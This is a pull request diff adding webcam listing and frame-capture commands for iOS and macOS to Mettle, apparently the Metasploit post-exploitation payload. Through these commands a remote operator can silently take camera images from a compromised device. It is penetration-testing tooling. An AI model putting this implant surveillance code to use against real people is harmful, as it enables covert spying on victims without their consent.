### PR TITLE
webcam_snap for iOS/Mac

### DIFF
--- a/make/Makefile.common
+++ b/make/Makefile.common
@@ -16,10 +16,13 @@ DEPS=$(ROOT)/deps
 OUTPUTDIR=$(BUILD)/data
 
 ifeq "$(shell uname -s)" "Darwin"
+    LDFLAGS:=$(LDFLAGS) -framework Foundation -framework AVFoundation -framework CoreMedia -framework CoreImage -framework CoreVideo
     ifneq (,$(findstring iphone,$(TARGET)))
         export SDKROOT=$(shell xcrun --sdk iphoneos --show-sdk-path)
+        LDFLAGS:=$(LDFLAGS) -framework UIKit -framework CoreGraphics
     else
         export SDKROOT=$(shell xcrun --sdk macosx --show-sdk-path)
+        LDFLAGS:=$(LDFLAGS) -framework AppKit
     endif
 endif
 

--- a/mettle/configure.ac
+++ b/mettle/configure.ac
@@ -17,6 +17,7 @@ LT_INIT
 case $host_os in
 	*darwin*)
 		HOST_OS=apple
+		OBJCFLAGS="$OBJCFLAGS -fobjc-arc"
 		;;
 	*linux*)
 		CPPFLAGS="$CPPFLAGS -D_DEFAULT_SOURCE -D_BSD_SOURCE -D_POSIX_SOURCE -D_GNU_SOURCE"

--- a/mettle/configure.ac
+++ b/mettle/configure.ac
@@ -8,12 +8,16 @@ AM_MAINTAINER_MODE([enable])
 m4_ifdef([AM_SILENT_RULES], [AM_SILENT_RULES([yes])])
 
 AC_PROG_CC
+AC_PROG_OBJC
 AC_PROG_CC_STDC
 AM_PROG_CC_C_O
 AC_PROG_LIBTOOL
 LT_INIT
 
 case $host_os in
+	*darwin*)
+		HOST_OS=apple
+		;;
 	*linux*)
 		CPPFLAGS="$CPPFLAGS -D_DEFAULT_SOURCE -D_BSD_SOURCE -D_POSIX_SOURCE -D_GNU_SOURCE"
 		;;
@@ -29,6 +33,7 @@ case $host_os in
 esac
 
 AM_CONDITIONAL([HOST_WIN],     [test x$HOST_OS = xwin])
+AM_CONDITIONAL([HOST_APPLE],     [test x$HOST_OS = xapple])
 
 CHECK_LIBC_COMPAT
 

--- a/mettle/src/Makefile.am
+++ b/mettle/src/Makefile.am
@@ -25,6 +25,7 @@ libmettle_la_SOURCES += network_client.c
 libmettle_la_SOURCES += network_server.c
 libmettle_la_SOURCES += tlv.c
 libmettle_la_SOURCES += stdapi/stdapi.c
+libmettle_la_SOURCES += stdapi/webcam/webcam.c
 if HOST_WIN
 libmettle_la_SOURCES += inet_ntop.c inet_pton.c
 libmettle_la_SOURCES += posix_win.c
@@ -33,6 +34,9 @@ else
 libmettle_la_SOURCES += process.c
 endif
 libmettle_la_SOURCES += util.c
+if HOST_APPLE
+libmettle_la_SOURCES += stdapi/webcam/apple_webcam.m
+endif
 
 if !HAVE_REALLOCARRAY
 libmettle_la_SOURCES += compat/reallocarray.c

--- a/mettle/src/stdapi/stdapi.c
+++ b/mettle/src/stdapi/stdapi.c
@@ -12,6 +12,7 @@
 #include "net/resolve.c"
 #include "sys/config.c"
 #include "sys/process.c"
+#include "webcam/webcam.c"
 
 void tlv_register_stdapi(struct mettle *m)
 {
@@ -26,4 +27,6 @@ void tlv_register_stdapi(struct mettle *m)
 
 	sys_config_register_handlers(m);
 	sys_process_register_handlers(m);
+
+	webcam_register_handlers(m);
 }

--- a/mettle/src/stdapi/webcam/apple_webcam.m
+++ b/mettle/src/stdapi/webcam/apple_webcam.m
@@ -1,0 +1,178 @@
+#import <AVFoundation/AVFoundation.h>
+
+#if TARGET_OS_IPHONE
+#import <UIKit/UIImage.h>
+#else
+#import <AppKit/NSImage.h>
+#endif
+
+#include "tlv.h"
+
+#define TLV_TYPE_WEBCAM_IMAGE          (TLV_META_TYPE_RAW     | TLV_EXTENSIONS + 1)
+#define TLV_TYPE_WEBCAM_INTERFACE_ID   (TLV_META_TYPE_UINT    | TLV_EXTENSIONS + 2)
+#define TLV_TYPE_WEBCAM_QUALITY        (TLV_META_TYPE_UINT    | TLV_EXTENSIONS + 3)
+#define TLV_TYPE_WEBCAM_NAME           (TLV_META_TYPE_STRING  | TLV_EXTENSIONS + 4)
+
+@interface Capture : NSObject <AVCaptureVideoDataOutputSampleBufferDelegate>
+- (void) captureOutput: (AVCaptureOutput*) output
+  didOutputSampleBuffer: (CMSampleBufferRef) buffer
+         fromConnection: (AVCaptureConnection*) connection;
+@end
+@interface Capture ()
+{
+  CVImageBufferRef head;
+  AVCaptureSession* session;
+  int count;
+}
+- (BOOL) start: (int) deviceIndex;
+- (void) stop;
+- (NSData *) getFrame;
+@end
+
+@implementation Capture
+
+- (id) init
+{
+  self = [super init];
+  head = nil;
+  count = 0;
+  return self;
+}
+
+- (void) dealloc
+{
+  [super dealloc];
+  @synchronized (self) {
+    if (head != nil) {
+      CFRelease(head);
+    }
+  }
+}
+
+- (BOOL) start: (int) deviceIndex
+{
+  session = [[AVCaptureSession alloc] init];
+  session.sessionPreset = AVCaptureSessionPresetMedium;
+
+  NSArray *devices = [AVCaptureDevice devicesWithMediaType:AVMediaTypeVideo];
+  AVCaptureDevice *device = devices[deviceIndex - 1];
+
+  NSError* error = nil;
+  AVCaptureDeviceInput* input = 
+    [AVCaptureDeviceInput deviceInputWithDevice: device  error: &error];
+  [session addInput:input];
+
+  AVCaptureVideoDataOutput *output = [[[AVCaptureVideoDataOutput alloc] init] autorelease];
+  [session addOutput:output];
+
+  dispatch_queue_t queue = dispatch_queue_create("webcam_queue", NULL);
+  [output setSampleBufferDelegate:self queue:queue];
+  dispatch_release(queue);
+
+  [session startRunning];
+  return true;
+}
+
+- (void) stop
+{
+  [session stopRunning];
+}
+
+- (NSData* ) getFrame
+{
+  //Wait for 5 seconds or for 5 frames otherwise the frame is too dark
+  for (int waitFrame = 0; waitFrame < 500; waitFrame++) {
+    if (count > 5) {
+      break;
+    }
+    usleep(10000);
+  }
+  @synchronized (self) {
+    if (head == nil) {
+      return nil;
+    }
+#if TARGET_OS_IPHONE
+    CIImage *ciImage = [CIImage imageWithCVPixelBuffer:head];
+    CIContext *temporaryContext = [CIContext contextWithOptions:nil];
+    CGImageRef videoImage = [temporaryContext
+      createCGImage:ciImage
+           fromRect:CGRectMake(0, 0,
+               CVPixelBufferGetWidth(head),
+               CVPixelBufferGetHeight(head))];
+    UIImage *uiImage = [[UIImage alloc] initWithCGImage:videoImage];
+    NSData* frame = UIImageJPEGRepresentation(uiImage, 1.0);
+    CGImageRelease(videoImage);
+    return frame;
+#else
+    CIImage* ciImage = [CIImage imageWithCVImageBuffer: head];
+    NSBitmapImageRep* bitmapRep = [[NSBitmapImageRep alloc] initWithCIImage: ciImage];
+    NSDictionary *props = [NSDictionary dictionary]; 
+    return [bitmapRep representationUsingType:NSJPEGFileType properties: props];
+#endif
+  }
+  return nil;
+}
+
+- (void) captureOutput: (AVCaptureOutput*) output
+  didOutputSampleBuffer: (CMSampleBufferRef) buffer
+         fromConnection: (AVCaptureConnection*) connection 
+{
+  CVImageBufferRef frame = CMSampleBufferGetImageBuffer(buffer);
+  CVImageBufferRef prev;
+  CFRetain(frame);
+  @synchronized (self) {
+    prev = head;
+    head = frame;
+    count++;
+  }
+  if (prev != nil) {
+    CFRelease(prev);
+  }
+}
+@end
+
+Capture* capture;
+
+struct tlv_packet *webcam_get_frame(struct tlv_handler_ctx *ctx)
+{
+  struct tlv_packet *p = tlv_packet_response_result(ctx, TLV_RESULT_SUCCESS);
+  NSData* jpgData = [capture getFrame];
+  if (jpgData) {
+    p = tlv_packet_add_raw(p, TLV_TYPE_WEBCAM_IMAGE, jpgData.bytes, jpgData.length);
+  }
+  return p;
+}
+
+struct tlv_packet *webcam_start(struct tlv_handler_ctx *ctx)
+{
+  uint32_t deviceIndex = 0;
+  uint32_t quality = 0;
+  tlv_packet_get_u32(ctx->req, TLV_TYPE_WEBCAM_INTERFACE_ID, &deviceIndex);
+  tlv_packet_get_u32(ctx->req, TLV_TYPE_WEBCAM_QUALITY, &quality);
+
+  int rc = TLV_RESULT_FAILURE;
+  capture = [[Capture alloc] init];
+  if ([capture start:deviceIndex]) {
+    rc = TLV_RESULT_SUCCESS;
+  } else {
+    capture = nil;
+  }
+  return tlv_packet_response_result(ctx, rc);
+}
+
+struct tlv_packet *webcam_stop(struct tlv_handler_ctx *ctx)
+{
+  [capture stop];
+  return tlv_packet_response_result(ctx, TLV_RESULT_SUCCESS);
+}
+
+struct tlv_packet *webcam_list(struct tlv_handler_ctx *ctx)
+{
+  struct tlv_packet *p = tlv_packet_response_result(ctx, TLV_RESULT_SUCCESS);
+  NSArray *devices = [AVCaptureDevice devicesWithMediaType:AVMediaTypeVideo];
+  for (AVCaptureDevice *device in devices) {
+    const char *webcam_str = (const char *)[[device localizedName]cStringUsingEncoding:NSUTF8StringEncoding]; 
+    p = tlv_packet_add_str(p, TLV_TYPE_WEBCAM_NAME, webcam_str);
+  }
+  return p;
+}

--- a/mettle/src/stdapi/webcam/webcam.c
+++ b/mettle/src/stdapi/webcam/webcam.c
@@ -1,0 +1,37 @@
+/**
+ * Copyright 2015 Rapid7
+ * @brief Webcam API
+ * @file webcam.c
+ */
+
+#include <endian.h>
+#include <errno.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+#include <mettle.h>
+
+#include "channel.h"
+#include "log.h"
+#include "tlv.h"
+
+#if __APPLE__
+extern struct tlv_packet *webcam_list(struct tlv_handler_ctx *ctx);
+extern struct tlv_packet *webcam_start(struct tlv_handler_ctx *ctx);
+extern struct tlv_packet *webcam_stop(struct tlv_handler_ctx *ctx);
+extern struct tlv_packet *webcam_get_frame(struct tlv_handler_ctx *ctx);
+#endif
+
+void webcam_register_handlers(struct mettle *m)
+{
+	struct tlv_dispatcher *td = mettle_get_tlv_dispatcher(m);
+
+#if __APPLE__
+	tlv_dispatcher_add_handler(td, "webcam_list", webcam_list, m);
+	tlv_dispatcher_add_handler(td, "webcam_start", webcam_start, m);
+	tlv_dispatcher_add_handler(td, "webcam_stop", webcam_stop, m);
+	tlv_dispatcher_add_handler(td, "webcam_get_frame", webcam_get_frame, m);
+#endif
+}
+


### PR DESCRIPTION
This implements webcam_snap for iOS and OSX.
Two things I'm not sure about:
- Currently we wait for 5 seconds or 5 frames before allowing webcam_get_frame to return. This is to allow the camera to warm up and prevent a black picture on the MacBook Air I've been testing on. It's possible we don't need this hack anywhere else so maybe I should just move/remove it (webcam_stream will still work).
- The code to convert a CVImageBufferRef to jpeg data is a little funky and could be improved.